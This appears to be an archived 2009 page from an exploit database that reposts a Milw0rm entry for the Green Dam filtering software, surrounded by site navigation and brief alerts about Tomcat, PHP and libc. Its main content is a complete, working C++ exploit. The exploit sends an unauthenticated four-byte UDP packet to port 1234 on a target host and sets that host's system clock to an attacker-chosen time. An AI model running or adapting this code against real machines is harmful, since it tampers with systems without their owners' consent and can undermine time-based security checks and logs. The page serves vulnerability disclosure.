|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 6514 Milw0rm ID : 9065 Credit : testgreendam Date : 03.07.2009 Exploit Code : // Green Dam listen on udp port 1234 and wait for the 4 bytes time value // We can send some bytes to change the time of the dest system // testgreendam[at]gmail.com #include <iostream> #include <boost/asio.hpp> #include <boost/date_time.hpp> int main(int argc, char* argv[]) { try { if (argc != 3) { std::cerr << "Usage: testgd <host> <time_string>" << std::endl; std::cerr << "Example: testgd 192.168.0.12 \"2009-06-03 16:00:00.000\"" << std::endl; std::cerr << "Timezone is not calculated, please do it by yourself." << std::endl; std::cerr << "testgreendam[at]gmail.com" << std::endl; return -1; } using boost::asio::ip::udp; boost::asio::io_service io_service; udp::socket s(io_service, udp::endpoint(udp::v4(), 0)); udp::endpoint dest( boost::asio::ip::address::from_string(argv[1]), 1234); boost::posix_time::ptime start(boost::gregorian::date(1900,1,1)); // (2008-1-1) -- (2010-12-31) boost::posix_time::ptime end(boost::posix_time::time_from_string(argv[2])); boost::posix_time::time_duration sec_count = end - start; unsigned int i = htonl(sec_count.total_seconds()); s.send_to(boost::asio::buffer((char*)&i, 4), dest); } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << std::endl; return -1; } return 0; } Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |